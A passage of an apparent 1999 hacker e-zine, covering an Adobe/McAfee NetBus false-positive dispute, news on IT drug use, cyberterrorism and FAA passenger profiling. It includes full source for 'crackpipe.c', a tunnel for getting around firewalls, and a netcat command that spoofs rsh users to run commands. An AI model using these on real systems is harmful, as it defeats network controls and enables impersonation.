http://www.adobe.com/supportservice/custsupport/SOLUTIONS/19bc6.htm
within which, they state, unequivocally (as I hoped they would);
"Adobe software, such as Acrobat Reader, does not include -- nor did it ever include -- any NetBus or NetBus Pro software."
Note, this means not in pre-release, not in released, not in any Adobe software (that goes for Pagemill too!).
This means, to me, this has truly been a mis-detection by NAI and Adobe should be believed and trusted on this point.
Now before I get a flood of messages from you X-Files fans out there, listen up.
1.Adobe has never threatened me. Their PR schpiel could use some work, and they should learn better how to deal with privacy issues and technical
consumers, but I don't, and haven't, felt compelled to say or do anything.
2.I have believed, all along, that this was a mis-detection. When Jim sent me the email from service@adobe.com, I was very suspicious. When I downloaded a
then current version of the pre-release and couldn't find a file called NETBUSPRO.DR in there anywhere, I scratched my head and wrote some things. All
along, however, I believed it would be borne out to be a mis-detection.
3.You guys, or those that responded to me directly (hundreds of you, thanks!), weren't so convinced. So my Adobe editorial reflected that skeptism and
doubt, mixed with the facts I had at hand.
4.For the die-hard conspiracy theorist amongst you, I have a copy of Jim's user's original download of the pre-release. Its 4.6MB zipped, and I won't send it
more than a couple of times, but if you can convince me its going to prove something for you to look at it, I'll pass it along.
There's a few lessons to be learnt here;
I.Anti-virus software will always mis-detect when they are based on signature "profiling".
II.AV Vendors should all have publicly accessible pages stating any and all mis-detections and should be updated immediately once a mis-detection is
confirmed. I don't think it matters what liability issues might be obstacles to such a page, the damage mis-detections can cause to individuals, corporations,
software distribution venues, as well as publishers, should be allayed by the AV Vendor who mis-detects.
I have had numerous reports from a variety of sources about the horror stories mis-detection has caused (and is still causing).
I don't think we need view mis-detections as a flaw in the AV software, since they're a fact of the way AV software works. Like Email hoaxes, such
spurrious incidents occur, and re-occur, and so should be stated somewhere for all to see.
One individual told me of how a mis-detection of a macro virus in a Word document led two partner companies to nearly dissolve their relationship because
of the insistance of both sides that they had the facts of the matter (virus or not virus).
III.If PR people are going to handle "rumors" such as this one with Adobe, they better know what they're talking about and whom they're talking to. Sarah,
from Adobe, meant to send a message to NTBugtraq but sent it to Bugtraq instead because "she got the names mixed up". Gee, I guess she hadn't read
any of the thread then, had she (or anyone in the PR side of Adobe). Next she send me a private unequivacol response to my explicit request for a
message to NTBugtraq...duh...
IV.It should be the responsibility of the AV Vendor to make all public statements about mis-detections, including coordinating with the "harmed" vendor and
making statements on their behalf. Where's NAI's public statement after all this time??? They must believe announcing they mis-detected something will
harm their share value...meanwhile Adobe is left hanging in the wind having to tell the world what NAI has said...without any public confirmation from NAI
themselves!!
Now Tim told me that our friend Vinnie, Vincent Gullotto, Manager of AV Researchers at AVERT, was "going to have a page put up soon". Well Tim, he told
me that too, last week...and we're still waiting.
Finally, many of you are probably wondering why I've spent any time on this, or what it has to do with NT Security in the first place...good question...;-]
Fact is, the original issue occured with 2 pieces of NT software, so its somewhat related to NT. More importantly, it was a test of the response mechanisms for the
companies involved. Think of it like those tests of the Early Warning System we used to get on TV.
As I told Tim;
a.Had the Adobe service rep., the one who responded to Jim's user's question about the detection, not said that a file called NETBUSPRO.DR was in the
Acrobat Reader package, none of this would ever have seen the light of day.
b.Had Adobe put up a publicly accessible page on 3/19, when they first knew, and had had confirmed by NAI, that McAfee VirusScan was mis-detecting,
none of this would ever have seen the light of day.
c.Had NAI responded to NTBugtraq when I asked them to, and they said they would, the issue would have been dead at that time.
d.Had Adobe's PR not put out the message they did, wherein they couldn't distinguish between a virus and a trojan, or between a malicious piece of code and
a commercial software package, and instead had said what they said later, the issue would have been dead.
They didn't, so the issue wouldn't die amongst you, and I kept getting messages making me say more and dig more.
All in all, Adobe's none too happy with my speculation and fact mix, NAI's probably not going to talk to me in the future (or for a while anyway), and I've annoyed
more than one of you with too many messages about this issue.
...sigh...the life of a moderator...;-]
Cheers,
Russ - NTBugtraq moderator
-------------------------------------------------------------------------------
http://www.adobe.com/supportservice/custsupport/SOLUTIONS/19bc6.htm
McAfee VirusScan 4.x Incorrectly Reports Virus in Ar40.exe or Ar40eng.exe
Document number 323180
Issue
McAfee VirusScan 4.x for Windows reports one or more of the following errors:
- "McAfee VShield: Virus found in download file!"
- "Downloaded File: AR40.ZIP -- Virus name: NetBusPro.dr -- McAfee suggests: You are trying to download or
transmit an infected file. Please delete this file and alert the Webmaster of the virus."
- "Infected File: AR40.EXE -- Virus name: NetBusPro.dr -- McAfee suggests: This virus cannot be cleaned. Please
delete the file and restore it from your backup diskettes."
- "AR40.EXE -- Infected by: NetBusPro.dr (No Remover Available) -- Status: Infected"
- "Downloaded File: AR40ENG.EXE -- Virus name: NetBusPro.dr -- McAfee suggests: You are trying to download
or transmit an infected file. Please delete this file and alert the Webmaster of the virus."
- "Infected File: AR40ENG.EXE -- Virus name: NetBusPro.dr -- McAfee suggests: This virus cannot be cleaned.
Please delete the file and restore it from your backup diskettes."
- "AR40ENG.EXE -- Infected by: NetBusPro.dr (No Remover Available) -- Status: Infected"
Details
- You are downloading or have downloaded Adobe Acrobat Reader 4.0 Pre-Release for Windows (Ar40.exe) or Adobe
Acrobat Reader 4.0 for Windows (Ar40eng.exe).
- You're using McAfee virus definitions 4.0.4017 dated March 15, 1999.
Solution
Download and install virus definitions 4.0.4019 or later from the McAfee Web site at http://www.mcafee.com/. The virus
definitions 4.0.4019 are dated March 29, 1999.
Additional Information
Adobe software, such as Acrobat Reader, does not include -- nor did it ever include -- any NetBus or NetBus Pro
software.
McAfee VirusScan 4.x falsely reports the NetBusPro.dr virus when scanning Ar40.exe and Ar40eng.exe when using
virus definitions 4.0.4017. The virus alert is caused by an error in version 4.0.4017 of the virus definitions file distributed
by Network Associates -- it is not caused by a virus. This has been confirmed by Adobe Systems, Inc. as well as by
the virus lab at Network Associates. When you install virus definitions 4.0.4019, VirusScan 4.x does not report an error
with Ar40.exe or Ar40eng.exe.
All pre-release and release versions of Acrobat 4.0 Reader are free of known viruses. Adobe uses a variety of
anti-virus software in addition to McAfee VirusScan to thoroughly screen all software before it is publicly released.
Ar40.exe was released in February 1999. Before uploading it, Adobe used VirusScan 4.x with virus definitions 4.0.4014
dated February 18, 1999 to verify Ar40.exe was clear of viruses. Before uploading Ar40eng.exe, released in April 1999,
Adobe used VirusScan 4.x with virus definitions 4.0.4019 to verify Ar40eng.exe was clear of viruses.
For further inquiries regarding this issue, please contact Sarah Rosenbaum, Group Product Manager for Adobe Acrobat,
at srosenba@adobe.com.
Related Records:
Product:
Acrobat Reader
Platform:
Windows
Last Updated:
04/08/99
Filename:
19bc6.htm
MacAfee
Legal Notice for information contained in the Technical Solutions Database
THIS DATABASE AND THE DOCUMENTS INCLUDED THEREIN (COLLECTIVELY, THE "DATABASE") ARE PROVIDED FOR THE
CONVENIENCE AND PRIVATE, INTERNAL USE OF ADOBE'S CUSTOMERS ONLY. YOU MAY NOT COPY OR DISTRIBUTE ANY PORTION
OF THIS DATABASE FOR ANY PURPOSE, EXCEPT THAT YOU MAY MAKE ONE PRINTED COPY OF PORTIONS OF THIS DATABASE FOR
YOUR OWN PERSONAL, INTERNAL USE ONLY, PROVIDED THIS ENTIRE DISCLAIMER AND COPYRIGHT NOTICE IS INCLUDED ON
SUCH COPY.
THE USER OF THE INFORMATION PROVIDED IN THIS DATABASE ASSUMES ALL RISK OF ITS ACCURACY AND FOR ITS USE. THIS
DATABASE IS BEING PROVIDED "AS-IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR
NON-INFRINGEMENT. ALL OTHER LIMITATIONS ON LIABILITY CONTAINED IN THE APPLICABLE SOFTWARE PRODUCT END USER
LICENSE AGREEMENT SHALL APPLY. ADOBE SYSTEMS INCORPORATED ASSUMES NO RESPONSIBILITY FOR ERRORS OR OMISSIONS
IN THE DATABASE. THIS DATABASE MAY INCLUDE TECHNICAL OR OTHER INACCURACIES OR TYPOGRAPHICAL ERRORS, AND
CHANGES MAY BE PERIODICALLY ADDED TO THE INFORMATION HEREIN.
ADOBE SYSTEMS INCORPORATED DOES NOT GUARANTEE THAT SOLUTIONS SUGGESTED IN THIS DATABASE WILL BE EFFECTIVE
IN THE USER'S PARTICULAR SITUATION. IF THE USER IS NOT FAMILIAR WITH ANY OF THE STEPS LISTED IN THE SOLUTION, ADOBE
ADVISES THAT THE USER DOES NOT PROCEED WITHOUT FIRST CONSULTING ADDITIONAL RESOURCES.
-------------------------------------------------------------------------------
Date: Wed, 14 Apr 1999 14:33:59 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Adobe: Conclusion Part 2 - final
FYI: NAI now has a public web statement posted at:
http://www.avertlabs.com/public/datafiles/valerts/vinfo/ar40-info.asp
This closes the issue.
Cheers,
Russ - NTBugtraq moderator
[http://www.avertlabs.com/public/datafiles/valerts/vinfo/ar40-info.asp]
Network Associates certifies that Adobe software, such as Acrobat
Reader, does not contain, and never did contain, the NetBusPro Trojan.
Posted April 13, 1999
McAfee VirusScan 4.x falsely reported the NetBusPro.dr
trojan when scanning Ar40.exe and Ar40eng.exe pre-release
software when using virus definitions 4.0.4017. The virus alert
was caused because there was identifying code within Adobe’s
product that had a similar pattern as trojan known as NetBusPro.dr.
This has been confirmed by the virus lab at Network Associates,
Inc. and by Adobe Systems Incorporated. If you are experiencing
this problem <a href="http://www.avertlabs.com/public/datafiles/4xupdates.asp">
please upgrade your DAT to virus definitions to at least v4.0.4019</a>,
and all issues will be rectified.
Sincerely,
AVERT, A Division Of NAI Labs
@HWA
10.0 Crackpipe.c bypasses any firewalls via tunneling (linux)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* crackpipe.c -- uses the ethertap stuff to try to tunnel an IP,
without using ipip, to break through firewalls. May the world's
fascist admins rot in hell for their port-blocking policies. */
/* usage information is in comments at the very end of this file */
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <fcntl.h>
/* define TCP or UDP here so we can decide how we'd like to
connect. */
#define UDP
#undef TCP
/* maximum size to use for the copy buffer */
/* setting the MTU of the tap device to something bigger than this
would probably be a bad idea, methinks */
#define BUFSIZE 4096
/* also, the mtu for the tap device must be smaller than the
mtu of your connection to the net... if it's not, packets will be
chopped up in transit.. looking at this, I'd say you've gotta have
16 bytes difference, at least, but what's the point in pushing your
luck. go for a couple hundered or so, so if your ethernet uses an
MTU of 1500, do something like 1200 for safety when you ifconfig
tap0 */
void selectloop(int netfd, int tapfd);
void usage(void);
char buffer[BUFSIZE];
main(int ac, char *av[]) {
int destport;
struct sockaddr_in destaddr;
struct hostent *ht;
int sock;
int daemon;
int netfd;
int tapfd;
/* check for a sane number of parameters */
if(ac != 3)
usage();
/* get port number, bail if atoi gives us 0 */
if((destport = atoi(av[2])) == 0)
usage();
/* check if we're a daemon or if we will connect. */
if(av[1][0] == '-')
daemon = 1;
else
daemon = 0;
if(!daemon) {
/* resolve DNS */
if((ht = gethostbyname(av[1])) == NULL) {
switch(h_errno) {
case HOST_NOT_FOUND:
printf("%s: Unknown host\n", av[2]);
break;
case NO_ADDRESS:
printf("%s: No IP address for hostname\n", av[2]);
break;
case NO_RECOVERY:
printf("%s: DNS Error\n", av[2]);
break;
case TRY_AGAIN:
printf("%s: Try again (DNS Fuckup)\n", av[2]);
break;
default:
printf("%s: Unknown DNS error\n", av[2]);
}
exit(0);
}
/* set up the destaddr struct */
destaddr.sin_port = htons(destport);
destaddr.sin_family = AF_INET;
memcpy(&destaddr.sin_addr, ht->h_addr, ht->h_length);
}
#ifdef TCP
sock = socket(AF_INET, SOCK_STREAM, 0);
#endif
#ifdef UDP
sock = socket(AF_INET, SOCK_DGRAM, 0);
#endif
if(sock == -1) {
perror("socket");
exit(0);
}
printf("Opening network socket.\n");
if(!daemon) {
if(connect(sock, &destaddr, sizeof(struct sockaddr_in)) ==
-1) {
perror("connect");
exit(0);
}
netfd = sock;
}
else {
struct sockaddr_in listenaddr;
#ifdef UDP
struct sockaddr_in remote;
#endif
int socklen;
listenaddr.sin_port = htons(destport);
listenaddr.sin_family = AF_INET;
listenaddr.sin_addr.s_addr = inet_addr("0.0.0.0");
if(bind(sock, &listenaddr, sizeof(struct sockaddr_in)) ==
-1) {
perror("bind");
exit(0);
}
socklen = sizeof(struct sockaddr_in);
#ifdef TCP
if(listen(sock, 1) == -1) {
perror("listen");
exit(0);
}
printf("Waiting for TCP connection...\n");
if((netfd = accept(sock, &listenaddr, &socklen)) == -1) {
perror("accept");
exit(0);
}
#else /* TCP */
netfd = sock;
recvfrom(netfd, buffer, BUFSIZE, MSG_PEEK, &remote,
&socklen);
connect(netfd, &remote, socklen);
#endif
}
/* right. now, we've got netfd set to something which we're
going to be able to use to chat with the network. */
printf("Opening /dev/tap0\n");
tapfd = open("/dev/tap0", O_RDWR);
if(tapfd == -1) {
perror("tapfd");
exit(0);
}
selectloop(netfd, tapfd);
return 0;
}
void selectloop(int netfd, int tapfd) {
fd_set rfds;
int maxfd;
int len;
if(netfd > tapfd)
maxfd = netfd;
else
maxfd = tapfd;
while(1) {
FD_ZERO(&rfds);
FD_SET(netfd, &rfds);
FD_SET(tapfd, &rfds);
if(select(maxfd+1, &rfds, NULL, NULL, NULL) == -1) {
perror("select");
exit(0);
}
if(FD_ISSET(netfd, &rfds)) {
FD_CLR(netfd, &rfds);
if((len = read(netfd, buffer, BUFSIZE)) < 1) {
if(len == -1)
perror("read_netfd");
printf("netfd died, quitting\n");
close(tapfd);
exit(0);
}
printf("%d bytes from network\n", len);
write(tapfd, buffer, len);
continue;
}
if(FD_ISSET(tapfd, &rfds)) {
FD_CLR(tapfd, &rfds);
if((len = read(tapfd, buffer, BUFSIZE)) < 1) {
if(len == -1)
perror("read_tapfd");
printf("tapfd died, quitting\n");
shutdown(netfd, 2);
close(netfd);
exit(0);
}
printf("%d bytes from interface\n", len);
write(netfd, buffer, len);
continue;
}
} /* end of looping */
}
void usage(void) {
printf("You fucked up the arguments.\n");
exit(0);
}
/* songs of firewalls, by the crackpipe author, just for some
interesting source reading. */
/* firewall song #1, to the tune of "the beverly hillbillies" */
/* ohhhh, lemme tell you a story about a man who's lame
this nasty admin oughta hang his head in shame,
thought one day "this network's kinda loose"
into his mind poured a bubblin' ooze... */
/* "firewalls," he thought...
no mail, no dns... */
/* well, the users decided, this shit has gotta go
we just need the proper sexy hunk of code,
well, crackpipe came and broke a hole on through,
and gave the bastards a needed "fuck you"... */
/* hmmmm. need to finish that eventualy */
/* alright, this should tell you how to use this fucker... well,
hopefully... */
/* alright, the args go something like this:
crackpipe <host | -> <port>
the first argument is either the hostname to connect to, or, if
you're the host which will be listening, a -.. obviously, the
system inside the firewall gives the hostname, and the free system
gives the -.
both sides must specify a port #... this should, clearly, be the
same for both ends...
that should explain it..
*/
/* oh, also, here's what you'll need to turn on in the linux kernel --
first, you'll need a kernel in the later 2.1 range... I'd say from
2.1.80 up should be cool, but I'm not positive about that.. if all
of the config options I mention below aren't present, it's too old.
in the "Networking Options" section, turn on:
"Kernel/User netlink socket"
and, just below,
"Netlink device emulation"
also, in the "Network device support" section, turn on:
"Ethertap network tap"
if those are compiled in, your kernel is set. */
/* configuring the ethertap device --
first, the necessary /dev files need to exist, so run:
mknod /dev/tap0 c 36 16
to get that to exist.
next, you have to ifconfig the ethertap device, so pick a subnet
you're going to use for that. in this example, we're going to use
the network 192.168.1.0, with one side as 192.168.1.1, and the
other as 192.168.1.2... so, you'll need to do:
ifconfig tap0 192.168.1.1(or .2) mtu 1200
(see the notes at the beginning for a good size for the mtu value.
basically, it's got to be lower than the mtu value listed for eth0
when you run ifconfig)
2.1 kernels should create the needed route automatically, so that
shouldn't be a problem.
*/
/* hopefully, no matter how 14m3 you are, that will give you some idea
of what you need to do, config-wise. if not, well, then ask some
'1337 linux-guru type d00d, and hopefully he can get the routing
and shit right. */
11.0 Unix rshd and rsh/rpc vulnerabilties in WindowsNT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 8 Apr 1999 19:11:54 -0700
From: Eric Gisin <ericg@TECHIE.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: rsh/rcp is not secure
This is really a UNIX rshd bug, but it affects users of the NT clients.
It's old news that the BSD rsh/rcp services are not secure, however rshd is
still is enabled in many UNIX systems. There are rsh/rcp clients in Windows
NT, and people are not aware of the ease of defeating security in this
environment.
The security of this service is based on privileged ports, which are not
widely implemented. The NT versions of rcp/rsh have no special privileges
like the UNIX versions. Anyone can modify the source or use netcat to fake
the client username. For example,
D:> nc -v unixhost 514 -p 666
^@newbie^@newbie^@chmod a= .^@
This will execute the chmod command under newbie's account, if he permits
access from that client machine in .rhosts.
Basically the problem is since Windows NT includes rsh/rcp, people assume
it's as secure as the UNIX counterpart, which is not the case.
--------------------------------------------------------------------------
Date: Fri, 9 Apr 1999 09:28:04 -0700
From: David LeBlanc <dleblanc@MINDSPRING.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: rsh/rcp is not secure
At 07:11 PM 4/8/99 -0700, Eric Gisin wrote:
>Basically the problem is since Windows NT includes rsh/rcp, people assume
>it's as secure as the UNIX counterpart, which is not the case.
The UNIX counterpart isn't really all that secure in any case - it assumes
that no one on the network can be root, and so come from a low port.
Something else to think about is that running a rshd on NT isn't usually a
good idea - several implementations run everything as LocalSystem, and the
ones that don't store live user passwords.
These utilities are full of other security holes - look at the checks in
the various scanning products for some examples. Safest thing is just not
to run rsh, rlogin and rexec.
David LeBlanc
dleblanc@mindspring.com
@HWA
12.0 IT professionals are on Drugs?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From The Independent (UK)
http://www.independent.co.uk/net/990419ne/story1.html
The high techies
They are young, well-paid and, increasingly, turning to recreational
drugs to cope with the pressures of their jobs as IT programmers,
engineers and developers. By Samantha Downes
The violent death of Chris Dawes, multi-millionaire founder
of software company Micromuse, grabbed the headlines
last month. Dawes was killed when his �640,000 F1
McLaren crashed in rural Essex.
At the time, he was facing charges for possession of and
intent to supply crack cocaine.
While Dawes' death may be an extreme example of the
perils of being a hi-tech high flyer, there is a proliferation of
recreational drug use in the IT industry.
Young IT professionals have eschewed the 1980s black
suit for combat fatigues and trainers. The dance and drugs
culture has been enthusiastically embraced by these affluent
twentysomethings who do not have time for long lunches or
hanging out in wine bars.
The IT programmers and engineers The Independent met
in London clubs saw their drug taking as an outlet which
eases long hours and mops up some of their considerable
salaries. Robert, a 23-year-old London-based web
designer, believes he is a typical example of the
recreational drug user.
He started taking speed while at university and has
graduated to ecstasy and cocaine since starting his job two
years ago. "That coke-snorting thing behind the wheel of a
Ferrari is such a bloody clich�," he said. "It's not about
being glamourous now, it's about relaxing and being
sociable."
Jules, also 23, is a "boring nerd, but I do love my job". He
works as a systems engineer at an investment bank and,
like Robert, takes ecstasy, but only at weekends. "We all
work incredibly hard. Most of the time there are not
enough hours for an after-work beer," he said.
"And although the work can be monotonous it is very well
paid. So getting blasted is simply a fast route to relaxation."
Extra pressures such as the millennium bug have pushed IT
professionals into fitting the archetypal recreational drug
abuser profile, according to Dr David Best, research
co-ordinator at the National Addiction Centre and an
honourary lecturer at the Institute of Psychiatry.
Dr Best believes that recreational drug abusers are
attracted by the image of drug taking as much as the effect
of the drugs themselves.
"Stimulant drugs like cocaine are appealing to young
wealthy executives because they are associated with
gregarious, sociable behaviour," he said. "They are more
likely to be used by young up and coming professionals
recreationally. These people have a high disposable income
and their jobs are pressurised and demanding."
The IT industry's relative youth and its location in cities or
large towns also make it prey to opportunistic pushers.
Most weekend users admit that they do not have to go out
hunting for drugs. "My boss supplies me with the drugs,"
one female programmer said.
There are geographical variations in drug availability. It is
more likely in cities, but it will also depend on the network
of the individuals involved and their external contacts, Dr
Best said: "Those who sell drugs are opportunistic and if
they see a market they will sell to it."
Dr Best said small firms in newer industries are less likely
to have the screening processes in place to discourage drug
taking. American financial firms in the City have for several
years implemented strict and expensive screening, but there
appear to be few measures to prevent or dissuade some
young IT employees from taking drugs.
Louise, a 20-year-old software developer from
Hertfordshire, travels down to London each weekend to
join her young, heavily salaried bosses for a binge. "I work
in a young industry where things are changing all the time. I
am highly stressed a lot of the time. Most days I'm working
12 to 14 hours. I can't afford to live in London because I
work out in the sticks. But because of my hours during the
week I can spend what I earn going out every weekend.
It's easy to get drugs, whether E, speed or coke."
Personality-based theories of drug use might find
sustenance in the stereotypical image of the nerdy
computer boffin.
"We found that drug users tend to be those with low
autonomic arousal, people who have low levels of system
activity," Dr Best said. "They need external stimuli and are
those most likely to pursue drugs."
"My job is not creative, but that doesn't mean that I'm not
creative," explained Louise. "When I'm on E it feels like my
mind has opened up - I don't care about anything."
According to the Standing Conference on Drug Abuse,
there have been more than 70 notified deaths of ecstasy
users in the UK since 1992, but most of the users we
spoke to felt the risks were infinitesimal. Those who took
cocaine or speed were even less concerned, because these
drugs are seen as more established and their effects as
better documented.
But employers who turn a blind eye should note the
side-effects identified by Dr Valerie Curran, reader in
psychopharmacology at University College London. Her
research has shown that a significant number of users are
liable to bouts of depression. This manifests itself in what
the Institute for Drug Dependence calls "presenteeism" -
where people were at work but unable to perform their job
to the best of their ability.
"We found regular users who were clinically depressed at
some stage during the week," Dr Curran said. "Ecstasy
makes your brain spill out huge levels of serotonin, the
feel-good hormone, and the brain has to work really hard
to get it back."
Dr Curran found that the average use of ecstasy and
cocaine was every other week. But regular users need
more to keep them at the same level of high.
"If you give four doses of ecstasy to a monkey it still has
brain damage two years later," she said.
But Anne Marshall, director of Adfam, believes that
weekend drug users are well aware of the risks of their
illicit habit. "When it comes to the health issues, people
poo-poo all the information pushed at them. Those who
use drugs at the weekend have the attitude: 'I work hard, I
like to relax but don't have the time, so I need to take
something to switch off immediately.'
"The problem might not be at a level that is important, but
the effects can be long term: relationships with partners or
friends may break down, which can be just as damaging."
But Marshall believes that in most cases users stop
because they simply get too old. "As with alcohol, where
the effects of a hangover get worse even as you enter your
mid-20s, so too do the effects of drug abuse. That's when
people start to re-think their habit. It gets harder to sustain
and they have to look for something more rewarding."
Peter Skyte, national officer for the 12,000-strong IT
Professionals Association, part of the Manufacturing
Science and Finance Union, said employers had a duty to
prevent drug abuse: bosses should look for "the problem
not the symptom".
"Drug problems may be work related," Mr Sykes said.
"Many employers may worsen problems by imposing
certain conditions. They have an obligation to identify risks
in the workplace, such as the stress which can be caused
by long hours.
"We would urge all employers, no matter how small, to
make a commitment at senior levels to provide counselling
and support for all employees," he added.
@HWA
13.0 Rand corporation releases a paper on Cyber Terrorism
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From wired:http://www.wired.com/news/news/politics/story/19208.html
How to Fight a Cyberwar
Wired News Report
3:00 a.m. 20.Apr.99.PDT
Future terrorists will take to the Internet to pursue campaigns of disruption instead
of destruction, a new report predicts.
Terrorists are already tech-savvy, the Rand Corporation paper claims. Osama bin
Laden's remote Afghan retreat is well wired: "The terrorist financier has
computers, communications equipment, and a large number of disks for data
storage."
Hamas has also taken to the Internet to exchange operational information. For
example, operatives communicate via chat rooms and email.
The report distinguishes between "cyberwar" -- a military operation -- and
"Netwar," which, the authors believe, will consist of nonmilitary attacks perpetrated
by individuals rather than countries. "Whereas cyberwar usually pits formal
military forces against each other, Netwar is more likely to involve nonstate,
paramilitary, and irregular forces."
The report, prepared for the US Air Force, recommends that the Pentagon stop
modernizing all computer systems and communications links. "Full
interconnectivity may in fact allow cyberterrorists to enter where they could
not [before]," it says.
The report warns that terrorism "will focus on urban areas with strong political
and operational constraints." Translation: It's difficult for the Air Force to bomb the
bejesus out of a terrorist nest if it's in downtown New York.
Another recommendation is that the Air Force develop better spying technologies.
Instead of trying to break encryption, the military should develop "capabilities for
reading emanations" from computer monitors, perhaps through "very small,
unmanned aerial vehicles."
Other studies have reached similar conclusions about online terrorists.
"The Internet -- and the window to it, the computer terminal -- have become
two of the most important pieces of equipment in the extremists' arsenals, not
only allowing them to build membership and improve organization, but to strike
alliances with people and groups, even a decade ago, that they might never have
known about or been able to easily communicate with," says a report
prepared in April 1998 for the Chemical Manufacturers Association. The report's
authors are former officials from the US Secret Service and the CIA's
counterterrorism center.
@HWA
14.0 FAA to implement CAPS
~~~~~~~~~~~~~~~~~~~~~
Via HNN and Wired http://www.wired.com/news/news/politics/story/19218.html
FAA to Implement CAPS
contributed by Space Rogue
A $2.8 Billion system is to be used by the FAA to monitor airline passengers.
Traveler information will be run through the FAAs secret algorithm and matched
against a terrorist profile. If passengers fit the profile, or are chosen at
random, increased security will be given to their luggage. While some airlines
(NorthWest) have already voluntarily implemented computer-assisted passenger
screening programs (CAPS), the FAA may make it mandatory for all airlines.
(Hmmm, maybe I won't go to DefCon after all.)
You? A Terrorist? Yes!
by Declan McCullagh
3:00 a.m. 20.Apr.99.PDT
WASHINGTON -- A US$2.8-billion monitoring system championed by Vice President Gore
will use computer profiles to single out airline passengers for investigation and
scrutiny.
Airlines will use a secret algorithm to compare travelers' personal data to profiles
of likely terrorists, according to a new proposed federal regulation.Other travelers
will be chosen at random.
Critics complain the plan shows that Gore doesn't really support privacy. Last May,
the vice president told an audience of graduating students at New York University that
privacy "is a basic American value."
"He's been talking about privacy and the protection of personal information online, but
those principles that he talks about don't parallel what he's done. He's tried to force
intrusive measures into law," says Lisa Dean, vice president of the Free Congress
Foundation. "We'd have even more of this with a President Gore."
The vice president chaired a high-level White House commission that in 1997 released
recommendations that the Federal Aviation Administration compiled into a 40-page rule
published Monday.
Unless FAA officials change their minds, all 32 US-based airlines will be required to
concoct computer-assisted passenger screening programs, called CAPS. Many of the larger
airlines, including Northwest Airlines, have already complied.
"It's software that runs on the airline's reservation system. What it does is select
passengers whose checked bags will require additional security and it also selects
passengers at random," says FAA spokesperson Rebecca Trexler.
According to the proposed rule, "Random selection helps to ensure passengers' civil
liberties by guaranteeing that no individual or group of individuals is excluded from
the selection process."
Airlines will already know that you are flagged as a suspicious passenger when you
arrive at the ticket counter, according to Susan Rork, managing director of security at
the Air Transport Association.
"The customer service agent would get a signal whether you would be selected for
additional security measures," said Rork, and your checked luggage would be put aside
to be examined for bombs.
Might you be interrogated by police as well? "We are not at this point taking this beyond
the checked baggage," she said. Exactly how CAPS databases profile Americans and what
information is used remains secret. The FAA, the Department of Justice, and the airline
industry -- which jointly developed terrorism profiles behind closed doors -- all claim
that details must remain confidential for the system to work. The regulation says simply,
"The automated system 'scores' passengers according to a set of weighted criteria to
determine which should be subjected to additional security measures."
But testimony at a June 1998 House Transportation subcommittee hearing suggested that
terrorist profiles are built using a passenger's last name, whether the ticket was
purchased with cash, how long before departure it was bought, the type of traveling
companions, whether a rental car is waiting, the destination of the flight and passenger,
and whether the ticket is one-way or round-trip.
"Much of the information in that profile is proprietary. Essentially the profile is an
automated system, not a manual system. It's created from the passenger reservation records
and information that is gleaned in passenger reservation records," said ATA's Rork.
In an October 1997 report, the Department of Justice said that CAPS will analyze passenger
information by assigning positive and negative values to personal information. "To determine
whether a passenger should be selected, the airline reservation computer identifies the
factors that the passenger has hit upon and totals the positive and negative scores; those
passengers who score below the FAA-prescribed cutoff are selectees," The Department of Justice
said.
A letter from Attorney General Janet Reno accompanying the 12-page report said that CAPS "will
not discriminate on the basis of race, color, national or ethnic origin, religion, or gender."
Civil libertarians aren't so easily reassured. "This is not rocket science. Everyone who
knows profiling knows that innocent characteristics can have a disparate impact based on race,"
said ACLU legislative counsel Greg Nojeim.
"For example, a profile that uses past travel to a terrorist-list country to identify people who
will be selected for heightened scrutiny is guaranteed to discriminate against people who trace
their ancestry to those countries and visit their grandparents there."
The ACLU has collected a list of complaints about passenger profiling.
One respondent, who said he was a Northwest Airlines traveler, griped, "The representative
indicated that I was selected by the computer for special treatment. At that point, the security
person donned surgical gloves and proceeded to go through each and every item in my briefcase in
front of all people.... I was very displeased with the whole experience, and felt that it
constituted an unwarranted intrusion on my privacy."
Nojeim, a member of the Gore commission's civil liberties advisory panel, said that the commission
rejected his group's concerns. Among the recommendations not followed by the FAA are an end date to
the profiling system, an independent watchdog panel, and a commitment to not record names and
information about suspicious travelers. The FAA says that it currently plans to record that data
for 72 hours, but is considering keeping them on file for 18 months. The proposed regulation also
allows the FAA or law enforcement unlimited access to the records "in the course of investigating
accidents or security incidents."
The regulations stem from increasing government nervousness about terrorism. Officials warn that a
1995 conspiracy involved Ramzi Ahmed Yousef and other conspirators who planned to bomb 12 US airliners
over the Pacific Ocean. The 1996 crash of TWA flight 800 -- which the FBI and National Transportation
Safety Board said was not a terrorist act -- caused Clinton to create the Gore commission.
Not long after, the FAA gave a $3.1-million grant to Northwest Airlines to create CAPS and $7.8
million to assist other airlines in deploying it, according to agency figures. Northwest did not
immediately return phone calls.
While most of the large carriers have CAPS systems in place, smaller airlines could be in trouble.
The proposed rule states that the "FAA believes that if the potential cost of compliance materializes
as expected, several small operators could go out of business due at least in part to the proposed rule."
For each of the 12 smaller airlines, the FAA's estimated cost of compliance -- largely hiring staff
to do searches -- would be 0.2 to 7.2 percent of total revenues. The FAA estimates the total cost at
$2.3 billion over 10 years.
Critics have said the costs of such a plan outweigh the benefits and terrorists are unlikely to be
deterred in any case. "Profiling is a surrender. It's an effort to make people feel safer about flying
even though what's being done is highly invasive of passenger privacy, likely to result in
discriminatory searches, and unlikely to effectively stop bombings of airplanes," says the ACLU's Nojeim.
Comments on the proposed rule, which can be emailed to 9-NPRM-CMTS@faa.gov, must be received by 18 June.
@HWA
15.0 The Ebayla Hack
